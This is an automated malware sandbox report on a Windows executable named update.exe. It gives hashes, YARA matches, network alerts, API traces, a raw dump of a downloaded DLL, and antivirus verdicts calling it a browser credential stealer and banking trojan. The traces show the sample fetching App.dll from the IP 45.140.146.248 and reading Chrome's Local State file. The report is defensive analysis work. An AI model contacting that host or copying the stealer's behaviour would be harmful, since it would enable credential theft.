Summary | ZeroBOX

update.exe

Browser Login Data Stealer Generic Malware Malicious Library Downloader UPX Malicious Packer PE64 PE File OS Processor Check
Category Machine Started Completed
FILE s1_win7_x6401 July 8, 2024, 9:37 a.m. July 8, 2024, 9:48 a.m.
Size 826.0KB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 f8ae25eb2bef827759f8cd837ad85bda
SHA256 11cd1472cd1cc75245a148d4e9560bf7f7917443b36dec3f92ed79b8e743b399
CRC32 D4576184
ssdeep 12288:zKgT0C+p1QJteI+ynEWYgeWYg955/155/Z4ML4nvC66aNAl96acG/Eoz1I+MO/uR:zKe0C+p1QJD05vxP2ltpsj+MO/ucu
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • infoStealer_browser_b_Zero - browser info stealer
  • Network_Downloader - File Downloader
  • Malicious_Packer_Zero - Malicious Packer
  • IsPE64 - (no description)
  • UPX_Zero - UPX packed file
  • Generic_Malware_Zero - Generic Malware
  • OS_Processor_Check_Zero - OS Processor Check

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
45.140.146.248 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49161 -> 45.140.146.248:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 45.140.146.248:80 -> 192.168.56.101:49161 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

__exception__

stacktrace:
update+0x66570 @ 0x13fea6570
update+0x663f2 @ 0x13fea63f2
update+0x67e15 @ 0x13fea7e15
update+0x70623 @ 0x13feb0623
update+0x6cf9e @ 0x13feacf9e
update+0x41ed6 @ 0x13fe81ed6
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521

exception.instruction_r: 48 8b 48 20 48 83 ca ff 48 ff c2 44 38 34 11 75
exception.symbol: update+0x66570
exception.instruction: mov rcx, qword ptr [rax + 0x20]
exception.module: update.exe
exception.exception_code: 0xc0000005
exception.offset: 419184
exception.address: 0x13fea6570
registers.r14: 0
registers.r15: 0
registers.rcx: 0
registers.rsi: 0
registers.r10: 5367488400
registers.rbx: 0
registers.rsp: 2358464
registers.r11: 2355520
registers.r8: 4294967288
registers.r9: 119
registers.rdx: 5367488400
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0
1 0 0
suspicious_features Connection to IP address suspicious_request GET http://45.140.146.248/App.dll
request GET http://45.140.146.248/App.dll
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 741376
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x0000000180001000
process_handle: 0xffffffffffffffff
1 0 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $%£AÿaÂ/¬aÂ/¬aÂ/¬¦+­jÂ/¬¦,­gÂ/¬¦*­óÂ/¬3ª*­~Â/¬3ª+­oÂ/¬3ª,­iÂ/¬¦.­bÂ/¬aÂ.¬âÂ/¬ñ«'­`Â/¬ñ«/­`Â/¬ñ«Ð¬`Â/¬ñ«-­`Â/¬RichaÂ/¬PEd†½U1]ð" B òðS €€W<` M ” ´m (``Ð 883pôp¤ pठ` È.text`@ B  `.rdataV` F @@.datapI€ 2b @À.pdata Ð Ž” @@.rsrc``"@@.relocôp(@B@VAVAWHƒì0A‹ñM‹ðL‹úƒù ‡ŠH‰\$PH‹ ¸ H‰|$XHcùL‰d$`L%ÄïÿÿB€¼'pV HEµ H…Ût H‹Ëÿåy I‹Œü€Å I‹„üÐÅ I‰I‰…ötI‰ŒüÐÅ L‹d$`H‹|$XH…Ût H‹Ëÿ»y H‹\$P3ÀHƒÄ0A_A^^ÃH1 A¹ÅPL"& H‰D$ Hâ% ¹èP[¸HƒÄ0A_A^^ÃÌATAVAWHƒì@E‹áM‹ðL‹úƒù ‡ H‰\$`H‹@· H‰l$hH‰t$pHcñH‰|$8L‰l$0L-ÚîÿÿB€¼.pV HE1´ H…Ût H‹Ëÿûx I‹¼õ€Å I‹¬õÐÅ E…ätI‰¼õÐÅ L‹l$0H‹t$pH…Ût H‹ËÿÖx H‹\$`3ÀA‰?H‹|$8A‰.H‹l$hHƒÄ@A_A^A\ÃH0 A¹ÅPL,% H‰D$ Hì$ ¹èZZ¸HƒÄ@A_A^A\ÃÌÌÌÌÌÌÌÌÌÌH‹ˆE3ÉE‹ÁH…Àt H‹AÿÀH…ÀuõH‹H…Àt€H‹AÿÁH…ÀuõH…Òt ‹xA+À‰‹xA+ÁA+ÀÃÌÌÌÌÌÌÌÌH‹ÄL‰H L‰@‰PUHƒì`H‰Xð3íH‰pèH‹ÙH‹II‹ñH‰xàL‰`ØM‹àHcúH…ÉtÿÀw L‰t$0L‰|$(ƒÿ ‡ëHfíÿÿ‹Œº¸HÊÿáH‹ÖH‹Ëè/ÿÿÿA‰$9¬$„ÁH‹“H…Ò„±H‹ H…ÉtfDH‹H‹ÑH‹ÈH…ÀuòH‹ƒˆH‰H‹ƒH‰ƒˆH‰«éqH »A‰,$‹l‰9¬$„T‰©léI‹ý‰l$p@8{iuH‹ËèbrD‹ý9{(ŽªL‹åL‰l$8‹l$xff„H‹C M‹lM…ítbI‹EH‹0·Ž°‹¾¼ƒÁpùH‹ŽH‹I@ÿðv H‹ÎD‹ðÿDv D¯÷DðD¶¼ƒý uI‹MA‹Æ™÷y`D‹ð‹|$pAþ‰|$pAÿÇIƒÄ D;{(|ƒH‹´$ˆ3íL‹¤$€L‹l$8€{iuH‹ËèrA‰<$‰.éf‰l$x@8kiuH‹ËèqHD$xD‹õH‰ƒ°9k(Ž L‹ýfDH‹C I‹tH…ö„Ö¹ ÿ“u ‹NTN<N$N ¯ÁD$xH‹NH…Étÿiu ë‹ÅD$xH‹NHH…ÉtÿRu ë‹ÅD$xH‹N0H…Étÿ;u ë‹ÅD$xH‹N`H…Étÿ$u ë‹ÅD$xH‹~@H…ÿtfff„H‹WH‹Ëè$ƒH‹?H…ÿuìH‹~H…ÿt+H‹WH…ÒtH9«°uƒB<ÿuH‹ËèðáH‹?H…ÿuØAÿÆIƒÇ D;s(ŒÿÿÿH‹´$ˆH‰«°@8kiuH‹Ëèºp‹D$x‰.A‰$éH‹{HL$xH‰‹°‹Å‰D$xH…ÿt`H‹×H‹Ë腰H…ÿtCH9«°t H‹×H‹ËèL-ë-H;»˜rH;» sH‹ƒH‰H‰»ëH‹Ïè­,H‹H…ÿu¤‹D$xH‰«°‰.A‰$避 ‹ÕD‹Í9S(~DD‹œ$L‹ÅLcאH‹C I‹DH…ÀtH‹@H‹FŒ‘ÔE…ÛtB‰¬‘ÔÿÂIƒÀ ;S(|ˉ.E‰ $ë&‰.H9«¨ ‹ÅH9« ~¸A‰$ë½H‹KL‹|$(L‹t$0L‹d$@H‹|$HH‹t$PH‹\$XH…Étÿ s ‹ÅHƒÄ`]æ:u]:ÌÌÌÌH‰T$L‰D$L‰L$ SVWE3ÉL\$0IƒÃøH5ëèÿÿfff„¶ZH¾B€ë0D¶D¶R3Ò·¼F[ A€è0t/fff„¶AþÈö„0pU tS’¾ÀHÿÁRèPE„ÀuܾÃ;Ð|8·Ç;Ð1E„ÒtD:u'I‹CIƒÃHÿÁAÿÁ‰H‹T$(HƒÂH‰T$(E„Ò…mÿÿÿA‹Á_^[ÃÌÌÌÌÌÌH‰\$H‰l$VWAVHƒì0H‹úLL$ H¿¾ H‹ÙLD$hWÉèÿþÿÿƒø…¶CL5k= HƒÃ3ö<:…•LD$`H‰¾ HKèÈþÿÿƒø…YHƒÃ€;.ue¶KHCBö1tVò§Š H‹Øò¼Š ò%Ċ @„¾ÁHÿÃòYËòYÓfnÀ¶óæÀ¶ÈBö0òXÈò\ÌuÕò^ʶ‹T$`ë‹Ö‰T$`¶È‹D$hfnÂóæÀBö1‰G‹D$ f‰w(ÆG+‰GòXÁòG t¶CHÿÃBö0uò¶È‰w€ù-u½ÿÿÿÿë €ù+u9½LL$(LD$$H}½ HKèÌýÿÿƒøuakD$$<HƒÃD$(¯Å‰GëA¦¨ßt„Éë,HÿöBö0tff„¶CH[Bö0uñÆG-„À@•Æ…öu 9w•ÀˆG,3Àë¸H‹\$PH‹l$XHƒÄ0A^_^ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌHƒì€y(L‹Ù…r€y*H‰$t ‹IE‹K A‹[ëA¹¹ÐA‹Ùi=x9‡A€{)…DAÿAÆC(Aƒù¸…ëQDOÁAI A÷èD‹ÒAÁúA‹ÂÁèDи­‹ÛhAƒùAOÉÿÁiÉQ«÷鸅ëQD‹ÊAÁù A‹ÉÁéDÉAˆlDiÁ­ŽA÷èA‹ÂÁú‹ÊAÑÁéʙƒâÂÁøÁA+ƒÀÃA€{+fnÀóæÀò\¬ˆ òYĈ òH,ÐI‰tyAkC<òAC òY‰ ACiÀ`êHcÈòH,ÀH+ÈHÑA€{,I‰tDAiC`êH‹$fAÇC*AÆC,HcÈH+ÑI‰HƒÄÃ3ÀI‰I‰CI‰CI‰CI‰C I‰C(AÆC.H‹$HƒÄÃÌÌÌÌÌÌÌÌH‰\$WHƒì H‹YH‹úH‹CHH…Àu[H‹H‹H(H‹ƒ8|L‹€ˆM…ÀtHSHH‹ÈAÿЋÈH‹CHë$HT$0H‹ÈÿPxòD$0‹ÈòY· òH,ÀH‰CH…Ét3ÀH‰CHH‰H…À~ÆG(3ÀH‹\$8HƒÄ _ÃH‹\$8¸HƒÄ _ÃÌÌWÀòI f/ÈÆA)r*òn‡ f/Áv
request_handle: 0x0000000000cc000c
1 1 0
host 45.140.146.248
file UNC\VBoxMiniRdrDN
registry HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware Tools
Bkav W64.AIDetectMalware
Lionic Trojan.Win32.ClipBanker.Z!c
Elastic malicious (high confidence)
Cynet Malicious (score: 99)
Skyhigh BehavesLike.Win64.Dropper.ch
ALYac Gen:Variant.Razy.625064
Cylance Unsafe
VIPRE Gen:Variant.Razy.625064
Sangfor Spyware.Win32.Razy.V21l
K7AntiVirus Spyware ( 005b581b1 )
BitDefender Gen:Variant.Razy.625064
K7GW Spyware ( 005b581b1 )
Cybereason malicious.b2bef8
Arcabit Trojan.Razy.D989A8
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win64/Spy.Agent.IX
APEX Malicious
McAfee Artemis!F8AE25EB2BEF
Avast Win64:MalwareX-gen [Trj]
Kaspersky Trojan-Banker.Win32.ClipBanker.abza
MicroWorld-eScan Gen:Variant.Razy.625064
Rising Spyware.Agent!8.C6 (CLOUD)
Emsisoft Gen:Variant.Razy.625064 (B)
F-Secure Trojan.TR/AVI.Agent.vfmnb
McAfeeD ti!11CD1472CD1C
FireEye Generic.mg.f8ae25eb2bef8277
Sophos Mal/Generic-S
Ikarus Trojan.Win64.Spy
Webroot W32.Malware.Gen
Google Detected
Avira TR/AVI.Agent.vfmnb
Gridinsoft Ransom.Win64.Wacatac.sa
Microsoft Trojan:Win32/Wacatac.B!ml
ZoneAlarm Trojan-Banker.Win32.ClipBanker.abza
GData Gen:Variant.Razy.625064
Varist W64/ABTrojan.GEFJ-2601
DeepInstinct MALICIOUS
Malwarebytes Generic.Malware/Suspicious
TrendMicro-HouseCall TROJ_GEN.R002H09G624
MAX malware (ai score=82)
Fortinet W64/Agent.IX!tr.spy
AVG Win64:MalwareX-gen [Trj]
Paloalto generic.ml
CrowdStrike win/malicious_confidence_70% (D)
alibabacloud Trojan[spy]:Win/Razy.Gen